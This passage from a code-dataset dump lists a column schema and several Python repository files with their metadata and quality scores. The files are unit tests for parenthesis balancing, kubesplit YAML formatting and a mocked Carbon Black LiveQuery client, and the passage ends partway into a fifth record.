**Schema** (113 columns; each column name paired with its dtype):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |

The records below are listed one per section: repository metadata, the file `content`, then the remaining numeric columns in the order above.
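To make the schema concrete, here is a minimal sketch of loading and slicing rows with pandas. The file name is hypothetical, and the storage format (Parquet) is an assumption; adjust both to wherever this split actually lives:

```python
import pandas as pd

# Hypothetical shard path; the real dataset may ship as parquet or jsonl.
df = pd.read_parquet("data.parquet")

# Each `qsc_*_quality_signal` column holds a raw heuristic score; the
# matching `qsc_*` column (same name, no suffix) holds a small integer,
# which from the rows below appears to be a 0/1 filter flag.
py = df[df["lang"] == "Python"]
print(py[["max_stars_repo_name", "size", "avg_line_length", "hits"]].head())
```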
**Record 1: `test_parenthetics.py`** (Python · `.py` · 1,027 bytes · hexsha `683f23064e53c882ea56bc32523a8b3c20f432b5`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | Jakealope/New-Data-Structures | 0fa08a880dbf0f618c7c86c8ac318541d9381622 | MIT | null | null | null |
| issues | Jakealope/New-Data-Structures | 0fa08a880dbf0f618c7c86c8ac318541d9381622 | MIT | null | null | null |
| forks | Jakealope/New-Data-Structures | 0fa08a880dbf0f618c7c86c8ac318541d9381622 | MIT | null | null | null |

```python
from parenthetics import is_balanced
import pytest

# These are unit tests for the parenthetics.py file


def test_isone():
    assert is_balanced("(") == 1


def test_isneg():
    assert is_balanced(")") == -1


def test_iszero():
    assert is_balanced("( )") == 0


def test_withstring():
    assert is_balanced("this is a (string) with open and close") == 0


def test_mismatched():
    assert is_balanced("This is a string with )))))(((((( wrong order") == -1


def test_bug():
    assert is_balanced("()(") == 1


def test_greater_than_one():
    assert is_balanced("(((") == 1


def test_three():
    assert is_balanced("(((this is some text)))some more text") == 0


def test_three_unballanced():
    assert is_balanced("(((text))))(") == -1


def test_empty():
    assert is_balanced("") == 0


def test_no_paren():
    assert is_balanced("this is text no parenthesis") == 0


def test_jumbled_up():
    assert is_balanced("(()()))()") == -1


def test_will_it_break():
    assert is_balanced("()())(())(())(((") == -1
```

- avg_line_length 18.339286 · max_line_length 77 · alphanum_fraction 0.629017
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 142, 1027, 4.309859, 0.359155, 0.228758, 0.339869, 0.166667, 0.454248, 0.382353, 0.107843, 0.107843, 0, 0, 0, 0.015625, 0.189873, 1027, 55, 78, 18.672727, 0.719952, 0.047712, 0, 0, 0, 0, 0.199795, 0, 0, 0, 0, 0, 0.464286, 1, 0.464286, true, 0, 0.071429, 0, 0.535714, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0
- effective 0 · hits 7
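The `parenthetics` module under test is not included in this record. A minimal `is_balanced` consistent with the assertions above — 0 for balanced text, 1 when opens remain unclosed, -1 when a close arrives before its open — could look like this (a sketch, not the repository's actual implementation):

```python
def is_balanced(text: str) -> int:
    """Return 0 if parens balance, 1 if opens remain, -1 on premature close."""
    depth = 0
    for ch in text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return -1  # a ')' appeared before any matching '('
    return 1 if depth > 0 else 0
```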
**Record 2: `tests/test_output.py`** (Python · `.py` · 8,490 bytes · hexsha `6873ed48107437fbfdeff3bdadd526cecf36827a`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | looztra/kubesplit | 44f336614af806b2ca6e8f0ce2482995fa017f86 | Apache-2.0 | 21 | 2019-07-17T06:50:30.000Z | 2021-08-31T11:30:37.000Z |
| issues | looztra/kubesplit | 44f336614af806b2ca6e8f0ce2482995fa017f86 | Apache-2.0 | 16 | 2019-11-13T19:09:33.000Z | 2021-05-23T17:05:43.000Z |
| forks | looztra/kubesplit | 44f336614af806b2ca6e8f0ce2482995fa017f86 | Apache-2.0 | null | null | null |

```python
"""Test the output package."""
from io import StringIO
from yamkix.config import get_yamkix_config_from_default
from yamkix.yaml_writer import get_opinionated_yaml_writer
from kubesplit.k8s_descriptor import K8SDescriptor
from kubesplit.output import save_descriptor_to_stream
def test_roundtrip_when_preserve_quotes_true():
"""test_roundtrip_when_preserve_quotes_true."""
s_input = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: 'frontend'
string_double_quotes: "frontend"
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: "true"
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: "1"
"""
yamkix_config = get_yamkix_config_from_default(quotes_preserved=True)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor,
output,
yaml_instance=yaml_instance,
yamkix_config=yamkix_config,
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("output => [{0}]".format(s_output))
assert s_output == s_input
def test_roundtrip_when_preserve_quotes_false():
"""test_roundtrip_when_preserve_quotes_false."""
s_input = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: 'frontend'
string_double_quotes: "frontend"
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: "true"
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: "1"
"""
s_expected = """---
apiVersion: extensions/v1beta1 # with comment
kind: ReplicaSet
metadata:
name: tname
namespace: tns
annotations:
string_no_quotes: frontend
string_single_quotes: frontend
string_double_quotes: frontend
boolean_no_quotes: true
boolean_single_quotes: 'true'
boolean_double_quotes: 'true'
number_no_quotes: 1
number_single_quotes: '1'
number_double_quotes: '1'
"""
yamkix_config = get_yamkix_config_from_default(quotes_preserved=False)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_when_dash_inwards_false():
"""test_roundtrip_when_dash_inwards_false."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(dash_inwards=False)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_when_dash_inwards_true():
"""test_roundtrip_when_dash_inwards_true."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(dash_inwards=True)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_with_unconsistent_comments():
"""test_roundtrip_with_unconsistent_comments.
Comments badly placed should be pushed to 1 char after content
"""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(spaces_before_comment=1)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
def test_roundtrip_with_weird_comments_config():
"""test_roundtrip_with_weird_comments_config."""
s_input = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name : first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
s_expected = """---
apiVersion: v1 # with comment
kind: Pod
metadata:
name: yan_solo
namespace: tatouine
spec:
containers:
- name: first
image: nginx
ports:
- name: http
port: 80
- name: https
port: 443
"""
yamkix_config = get_yamkix_config_from_default(spaces_before_comment=7)
yaml_instance = get_opinionated_yaml_writer(yamkix_config)
parsed = yaml_instance.load_all(s_input)
for yaml_resource in parsed:
as_yaml = yaml_resource
descriptor = K8SDescriptor(
name="tname", kind="ReplicaSet", namespace="tns", as_yaml=as_yaml
)
output = StringIO()
save_descriptor_to_stream(
descriptor, output, yaml_instance, yamkix_config=yamkix_config
)
s_output = output.getvalue()
print("input => [{0}]".format(s_input))
print("expected => [{0}]".format(s_expected))
print("output => [{0}]".format(s_output))
assert s_output == s_expected
```

- avg_line_length 26.61442 · max_line_length 75 · alphanum_fraction 0.678445
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 1032, 8490, 5.260659, 0.09593, 0.070731, 0.025051, 0.033892, 0.949899, 0.93461, 0.883588, 0.883588, 0.883588, 0.883588, 0, 0.013674, 0.216137, 8490, 318, 76, 26.698113, 0.802104, 0.039812, 0, 0.870748, 0, 0, 0.429135, 0.047366, 0, 0, 0, 0, 0.020408, 1, 0.020408, false, 0, 0.017007, 0, 0.037415, 0.057823
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
- effective 0 · hits 7
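yamkix, which kubesplit uses for serialization in these tests, wraps ruamel.yaml's round-trip mode, and the quote-preservation switch being asserted maps onto ruamel.yaml's `preserve_quotes`. A standalone sketch of that underlying behaviour (plain ruamel.yaml, not the yamkix wrapper):

```python
import sys
from ruamel.yaml import YAML

yaml = YAML()  # round-trip mode: keeps comments, key order, and style
yaml.preserve_quotes = True  # keep 'true' / "1" quoted exactly as written

doc = yaml.load('a: "frontend"\nb: \'true\'\nc: 1\n')
yaml.dump(doc, sys.stdout)  # the quotes survive the round trip
```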
**Record 3: `util/test/report/__init__.py`** (Python · `.py` · 151 bytes · hexsha `cc1524e2bfec6dc9fbde7d8ad0fb040fb88220e3`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | henriquesimoes/humpback | ba687a71f95ef9c9c30426eefae11a69efd6f942 | BSD-3-Clause | null | null | null |
| issues | henriquesimoes/humpback | ba687a71f95ef9c9c30426eefae11a69efd6f942 | BSD-3-Clause | null | null | null |
| forks | henriquesimoes/humpback | ba687a71f95ef9c9c30426eefae11a69efd6f942 | BSD-3-Clause | null | null | null |

```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from .report import ReportManager, Report
```

- avg_line_length 30.2 · max_line_length 41 · alphanum_fraction 0.874172
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 19, 151, 6.210526, 0.473684, 0.254237, 0.40678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.112583, 151, 5, 41, 30.2, 0.880597, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0.25
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 1, 0, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0
- effective 0 · hits 7
**Record 4: `test/cbapi/psc/livequery/test_models.py`** (Python · `.py` · 10,779 bytes · hexsha `cc227c2e44657430d5cdb9fc5e743ffd2eb9ee38`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | mtmcgrew/cbapi-python | 6e81507ff30a57eb1f13ae829c28e6ee339d2ad1 | MIT | null | null | null |
| issues | mtmcgrew/cbapi-python | 6e81507ff30a57eb1f13ae829c28e6ee339d2ad1 | MIT | 1 | 2021-03-31T19:51:07.000Z | 2021-03-31T19:51:07.000Z |
| forks | deepakmishraapi/cbresponse | 420fa05d0f7b9d61e5682d7a69a4098f6c32e61c | MIT | null | null | null |

```python
import pytest
from cbapi.psc.livequery.rest_api import CbLiveQueryAPI
from cbapi.psc.livequery.models import Run, Result
from cbapi.psc.livequery.query import ResultQuery, FacetQuery
from cbapi.errors import ApiError
from test.cbtest import StubResponse, patch_cbapi
def test_run_refresh(monkeypatch):
_was_called = False
def _get_run(url, parms=None, default=None):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
_was_called = True
return {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "COMPLETE"}
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, GET=_get_run)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.refresh()
assert _was_called
assert rc
assert run.org_key == "Z100"
assert run.name == "FoobieBletch"
assert run.id == "abcdefg"
assert run.status == "COMPLETE"
def test_run_stop(monkeypatch):
_was_called = False
def _execute_stop(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/status"
assert body == {"status": "CANCELLED"}
_was_called = True
return StubResponse({"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "CANCELLED"})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, PUT=_execute_stop)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.stop()
assert _was_called
assert rc
assert run.org_key == "Z100"
assert run.name == "FoobieBletch"
assert run.id == "abcdefg"
assert run.status == "CANCELLED"
def test_run_stop_failed(monkeypatch):
_was_called = False
def _execute_stop(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/status"
assert body == {"status": "CANCELLED"}
_was_called = True
return StubResponse({"error_message": "The query is not presently running."}, 409)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, PUT=_execute_stop)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "CANCELLED"})
rc = run.stop()
assert _was_called
assert not rc
def test_run_delete(monkeypatch):
_was_called = False
def _execute_delete(url):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
if _was_called:
pytest.fail("_execute_delete should not be called twice!")
_was_called = True
return StubResponse(None)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, DELETE=_execute_delete)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.delete()
assert _was_called
assert rc
assert run._is_deleted
# Now ensure that certain operations that don't make sense on a deleted object raise ApiError
with pytest.raises(ApiError):
run.refresh()
with pytest.raises(ApiError):
run.stop()
# And make sure that deleting a deleted object returns True immediately
rc = run.delete()
assert rc
def test_run_delete_failed(monkeypatch):
_was_called = False
def _execute_delete(url):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg"
_was_called = True
return StubResponse(None, 403)
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, DELETE=_execute_delete)
run = Run(api, "abcdefg", {"org_key": "Z100", "name": "FoobieBletch", "id": "abcdefg", "status": "ACTIVE"})
rc = run.delete()
assert _was_called
assert not rc
assert not run._is_deleted
def test_result_device_summaries(monkeypatch):
_was_called = False
def _run_summaries(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/device_summaries/_search"
assert body == {"query": "foo", "criteria": {"device_name": ["AxCx", "A7X"]},
"sort": [{"field": "device_name", "order": "ASC"}], "start": 0}
_was_called = True
return StubResponse({"org_key": "Z100", "num_found": 2,
"results": [{"id": "ghijklm", "total_results": 2, "device_id": 314159,
"metrics": [{"key": "aaa", "value": 0.0}, {"key": "bbb", "value": 0.0}]},
{"id": "mnopqrs", "total_results": 3, "device_id": 271828,
"metrics": [{"key": "aaa", "value": 0.0}, {"key": "bbb", "value": 0.0}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_summaries)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_device_summaries().where("foo").criteria(device_name=["AxCx", "A7X"]).sort_by("device_name")
assert isinstance(query, ResultQuery)
count = 0
for item in query.all():
if item.id == "ghijklm":
assert item.total_results == 2
assert item.device_id == 314159
elif item.id == "mnopqrs":
assert item.total_results == 3
assert item.device_id == 271828
else:
pytest.fail("Invalid object with ID %s seen" % item.id)
count = count + 1
assert _was_called
assert count == 2
def test_result_query_result_facets(monkeypatch):
_was_called = False
def _run_facets(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/_facet"
assert body == {"query": "xyzzy", "criteria": {"device_name": ["AxCx", "A7X"]},
"terms": {"fields": ["alpha", "bravo", "charlie"]}}
_was_called = True
return StubResponse({"terms": [{"field": "alpha", "values": [{"total": 1, "id": "alpha1", "name": "alpha1"},
{"total": 2, "id": "alpha2", "name": "alpha2"}]},
{"field": "bravo", "values": [{"total": 1, "id": "bravo1", "name": "bravo1"},
{"total": 2, "id": "bravo2", "name": "bravo2"}]},
{"field": "charlie", "values": [{"total": 1, "id": "charlie1",
"name": "charlie1"},
{"total": 2, "id": "charlie2",
"name": "charlie2"}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_facets)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_result_facets().where("xyzzy").facet_field("alpha").facet_field(["bravo", "charlie"]) \
.criteria(device_name=["AxCx", "A7X"])
assert isinstance(query, FacetQuery)
count = 0
for item in query.all():
vals = item.values
if item.field == "alpha":
assert vals[0]["id"] == "alpha1"
assert vals[1]["id"] == "alpha2"
elif item.field == "bravo":
assert vals[0]["id"] == "bravo1"
assert vals[1]["id"] == "bravo2"
elif item.field == "charlie":
assert vals[0]["id"] == "charlie1"
assert vals[1]["id"] == "charlie2"
else:
pytest.fail("Unknown field name %s seen" % item.field)
count = count + 1
assert _was_called
assert count == 3
def test_result_query_device_summary_facets(monkeypatch):
_was_called = False
def _run_facets(url, body, **kwargs):
nonlocal _was_called
assert url == "/livequery/v1/orgs/Z100/runs/abcdefg/results/device_summaries/_facet"
assert body == {"query": "xyzzy", "criteria": {"device_name": ["AxCx", "A7X"]},
"terms": {"fields": ["alpha", "bravo", "charlie"]}}
_was_called = True
return StubResponse({"terms": [{"field": "alpha", "values": [{"total": 1, "id": "alpha1", "name": "alpha1"},
{"total": 2, "id": "alpha2", "name": "alpha2"}]},
{"field": "bravo", "values": [{"total": 1, "id": "bravo1", "name": "bravo1"},
{"total": 2, "id": "bravo2", "name": "bravo2"}]},
{"field": "charlie", "values": [{"total": 1, "id": "charlie1",
"name": "charlie1"},
{"total": 2, "id": "charlie2",
"name": "charlie2"}]}]})
api = CbLiveQueryAPI(url="https://example.com", token="ABCD/1234", org_key="Z100", ssl_verify=True)
patch_cbapi(monkeypatch, api, POST=_run_facets)
result = Result(api, {"id": "abcdefg", "device": {"id": "abcdefg"}, "fields": {}, "metrics": {}})
query = result.query_device_summary_facets().where("xyzzy").facet_field("alpha") \
.facet_field(["bravo", "charlie"]).criteria(device_name=["AxCx", "A7X"])
assert isinstance(query, FacetQuery)
count = 0
for item in query.all():
vals = item.values
if item.field == "alpha":
assert vals[0]["id"] == "alpha1"
assert vals[1]["id"] == "alpha2"
elif item.field == "bravo":
assert vals[0]["id"] == "bravo1"
assert vals[1]["id"] == "bravo2"
elif item.field == "charlie":
assert vals[0]["id"] == "charlie1"
assert vals[1]["id"] == "charlie2"
else:
pytest.fail("Unknown field name %s seen" % item.field)
count = count + 1
assert _was_called
assert count == 3
```

- avg_line_length 45.868085 · max_line_length 118 · alphanum_fraction 0.554875
- quality signals (41 values, `qsc_code_num_words_quality_signal` through `qsc_codepython_frac_lines_print_quality_signal`): 1191, 10779, 4.854744, 0.135181, 0.051366, 0.031131, 0.03459, 0.812003, 0.786579, 0.770668, 0.745763, 0.725182, 0.714978, 0, 0.030696, 0.2837, 10779, 234, 119, 46.064103, 0.718171, 0.014936, 0, 0.715, 0, 0, 0.223175, 0.035987, 0, 0, 0, 0, 0.295, 1, 0.08, false, 0, 0.03, 0, 0.15, 0
- quality flags (41 values, `qsc_code_num_words` through `qsc_codepython_frac_lines_print`): 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
- effective 0 · hits 7
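The pattern used throughout that file — swap the transport method for a closure that records it was called and returns a canned payload — does not depend on cbapi. A generic pytest sketch of the same idea (all names here are illustrative):

```python
class Client:
    def get(self, url):
        raise RuntimeError("no network access in tests")

    def fetch_name(self):
        return self.get("/v1/thing")["name"]


def test_fetch_name(monkeypatch):
    was_called = False

    def fake_get(url):
        nonlocal was_called
        assert url == "/v1/thing"  # pin the URL the code under test built
        was_called = True
        return {"name": "FoobieBletch"}  # canned payload

    client = Client()
    monkeypatch.setattr(client, "get", fake_get)
    assert client.fetch_name() == "FoobieBletch"
    assert was_called
```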
**Record 5: `lfd/environment/robot_world.py`** (Python · `.py` · 762 bytes · hexsha `0bd51f57f44bae5f607d86154168f449e1fd52f3`)

| group | repo | head hexsha | licenses | count | first event | last event |
|---|---|---|---|---|---|---|
| stars | def670/lfd | 9fef15f556cba49dd4b42c0c29505a4137f95fc5 | BSD-2-Clause | 36 | 2015-05-22T14:47:18.000Z | 2021-07-27T15:30:36.000Z |
